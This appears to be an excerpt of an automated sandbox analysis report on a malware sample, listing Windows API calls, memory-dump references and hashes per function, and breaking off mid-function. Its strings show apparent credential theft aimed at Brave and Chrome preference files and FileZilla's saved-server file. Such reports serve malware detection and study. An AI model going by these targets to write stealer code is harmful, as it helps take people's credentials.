                                  • GetFileAttributesA.KERNEL32(00000000), ref: 00301F45
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00301F9F
                                  • lstrlen.KERNEL32(01028990), ref: 00301FAE
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00301FDB
                                  • lstrcat.KERNEL32(00000000,?), ref: 00301FE3
                                  • lstrlen.KERNEL32(00331794), ref: 00301FEE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030200E
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030201A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00302042
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030204D
                                  • lstrlen.KERNEL32(00331794), ref: 00302058
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00302075
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00302081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                  • String ID: \*.*
                                  • API String ID: 4127656590-1173974218
                                  • Opcode ID: 4075be6b45e1b2ac00990b6ac88ecee8da4d3d0df16a301fe22a9f48cc3d51e1
                                  • Instruction ID: aafb22aa570408b7abc61236fabe11b81aa666ca17a357b4877fadb216d77b6c
                                  • Opcode Fuzzy Hash: 4075be6b45e1b2ac00990b6ac88ecee8da4d3d0df16a301fe22a9f48cc3d51e1
                                  • Instruction Fuzzy Hash: 40929571A122169BCB23EFA4DDACAAF77B9AF14700F054124F805AB291DF74DD09DB90
                                  Function 0030DB80 Relevance: 176.2, APIs: 96, Strings: 4, Instructions: 1193stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DBEF
                                  • lstrlen.KERNEL32(00334CA8), ref: 0030DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC17
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 0030DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC4C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DC8F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0030DCD0
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0030DCF0
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0030DD0A
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0030DD1D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DD7B
                                  • lstrlen.KERNEL32(00331794), ref: 0030DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDA3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DDAF
                                  • lstrlen.KERNEL32(?), ref: 0030DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DE19
                                  • lstrlen.KERNEL32(00331794), ref: 0030DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DE6F
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DE7B
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DEBB
                                  • lstrlen.KERNEL32(00331794), ref: 0030DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DEE6
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DEF2
                                  • lstrlen.KERNEL32(01028800), ref: 0030DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFA5
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DFB1
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DFF4
                                  • lstrlen.KERNEL32(00331794), ref: 0030DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E022
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030E02E
                                  • lstrlen.KERNEL32(01028800), ref: 0030E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0030E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0030E0E7
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E11F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0030E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E1F9
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E22F
                                  • lstrlen.KERNEL32(01028990), ref: 0030E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E261
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 0030E269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 0030E274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0030E2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E349
                                  • DeleteFileA.KERNEL32(?), ref: 0030E381
                                  • StrCmpCA.SHLWAPI(?,0102CB40), ref: 0030E3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E445
                                  • StrCmpCA.SHLWAPI(?,01028800), ref: 0030E468
                                  • StrCmpCA.SHLWAPI(?,01028B40), ref: 0030E47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0030E4E0
                                  • StrCmpCA.SHLWAPI(?,0102CA80), ref: 0030E58E
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0030E776
                                  • DeleteFileA.KERNEL32(?), ref: 0030E7D2
                                  • StrCmpCA.SHLWAPI(?,01028960), ref: 0030E7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: a069b476683f6738ebd7e2108bd299229fb4f2b7b62024c80283089324ab3e10
                                  • Instruction ID: a5a82309669412ff12d767980e4d55ef90f70ffd36209d4146b1c02a5a3cfc57
                                  • Opcode Fuzzy Hash: a069b476683f6738ebd7e2108bd299229fb4f2b7b62024c80283089324ab3e10
                                  • Instruction Fuzzy Hash: 3F927671A122169BCB22EFB4DC99AAF77B9AF54300F054528F805AB391DF74DC49CB90
                                  Function 003118A0 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003118D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003118DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003118FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0031190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00311947
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 00311967
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311981
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003119BF
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003119F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311A4C
                                  • lstrlen.KERNEL32(00331794), ref: 00311A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311A80
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311AB4
                                  • lstrlen.KERNEL32(?), ref: 00311AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B19
                                  • lstrlen.KERNEL32(010288C0), ref: 00311B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B8F
                                  • lstrlen.KERNEL32(00331794), ref: 00311BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311BC3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C57
                                  • lstrlen.KERNEL32(00331794), ref: 00311C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C8B
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D21
                                  • lstrlen.KERNEL32(00331794), ref: 00311D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D55
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311DED
                                  • lstrlen.KERNEL32(00331794), ref: 00311E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311E36
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311E68
                                  • lstrlen.KERNEL32(0102CA98), ref: 00311E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311EB2
                                  • lstrlen.KERNEL32(00331794), ref: 00311EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311EE3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F15
                                  • lstrlen.KERNEL32(0102D468), ref: 00311F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F5F
                                  • lstrlen.KERNEL32(00331794), ref: 00311F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F90
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311FC2
                                  • lstrlen.KERNEL32(0101B2E8), ref: 00311FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312036
                                  • lstrlen.KERNEL32(00331794), ref: 00312048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312067
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00312073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312098
                                  • lstrlen.KERNEL32(?), ref: 003120AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003120D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003120DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312103
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031213F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0031214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: c2c317d2864fd3335179f58c153c16f68df28ddc47a3777e52427942049f0198
                                  • Instruction ID: c4f3e3ce4bf334950db33cf92613df71300f4f98d240796ed2c3e689bc92e54b
                                  • Opcode Fuzzy Hash: c2c317d2864fd3335179f58c153c16f68df28ddc47a3777e52427942049f0198
                                  • Instruction Fuzzy Hash: 9662A070A126169BCB27AF68DC8CAEF77B9AF58700F050124F905AB290DF34DD59DB90
                                  Function 00313910 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 0031392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00313943
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031396C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00313986
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003139BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003139E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003139F2
                                  • lstrlen.KERNEL32(00331794), ref: 003139FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A1A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313A26
                                  • lstrlen.KERNEL32(?), ref: 00313A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A8A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00313ACE
                                  • lstrlen.KERNEL32(?), ref: 00313AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B36
                                  • lstrlen.KERNEL32(00331794), ref: 00313B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B6A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B9E
                                  • lstrlen.KERNEL32(?), ref: 00313BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313BE0
                                  • lstrlen.KERNEL32(01028990), ref: 00313C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313C3C
                                  • lstrlen.KERNEL32(010288C0), ref: 00313C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313CB7
                                  • lstrlen.KERNEL32(00331794), ref: 00313CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313CE8
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313D79
                                  • lstrlen.KERNEL32(00331794), ref: 00313D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313DAD
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E43
                                  • lstrlen.KERNEL32(00331794), ref: 00313E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E77
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F0D
                                  • lstrlen.KERNEL32(00331794), ref: 00313F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F41
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F75
                                  • lstrlen.KERNEL32(?), ref: 00313F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313FE0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031401F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0031402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003140CE
                                  • lstrcat.KERNEL32(00000000), ref: 003140DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003142D9
                                  • FindClose.KERNEL32(00000000), ref: 003142E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 41fd7f59895cc167d0deb303e856a4cb08cead48eefb3d68a0fb97a36f19e1dc
                                  • Instruction ID: 1771d68582f7b54b0b066474d3317ea5a2cfcfe296a16a111a6ea809bf7dd282
                                  • Opcode Fuzzy Hash: 41fd7f59895cc167d0deb303e856a4cb08cead48eefb3d68a0fb97a36f19e1dc
                                  • Instruction Fuzzy Hash: A9628371A116169BCB27AFA8DC8DAEF77B9AF58300F054124F805A7290DF74DE49CB90
                                  Function 00316960 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003169C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00316A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00316A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00316AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00316B35
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316B9D
